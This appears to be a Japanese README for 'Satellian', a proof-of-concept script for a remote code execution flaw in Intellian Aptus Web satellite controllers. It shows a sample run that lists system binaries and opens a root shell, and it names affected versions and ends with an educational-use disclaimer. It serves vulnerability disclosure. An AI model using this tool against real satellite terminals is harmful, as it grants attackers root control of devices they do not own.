
Intellian SatelliteコントローラにおけるRCE脆弱性を示すPoCスクリプト
Satellianは、Intellian衛星コントローラー(Intellian Aptus Web)におけるRCE脆弱性を示すPoCスクリプトです。
以下のスクリプトは、システム内のすべてのバイナリをリストし、その後テスターがサーバーと直接(通常はrootとして)対話できるようにします。
xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
________________________________________
(__) / \
(oo) ( Intellian Satellite Terminal PoC )
/-------\/ --' \________________________________________/
/ | ||
* ||----||
Performing initial scan. Listing available system binaries.
Starting request to http://<redacted>
Executing command /bin/ls /bin
acu_server
acu_tool
addgroup
adduser
...
Satellian $ id
uid=0(root) gid=0(root)
Intellian v1.12, v1.21, v1.24。
このリポジトリのすべての情報は教育目的のみです。リポジトリの作成者は、情報の誤用について一切責任を負いません。このスクリプトは概念実証であり、悪意のある活動のために開発されたものではありません。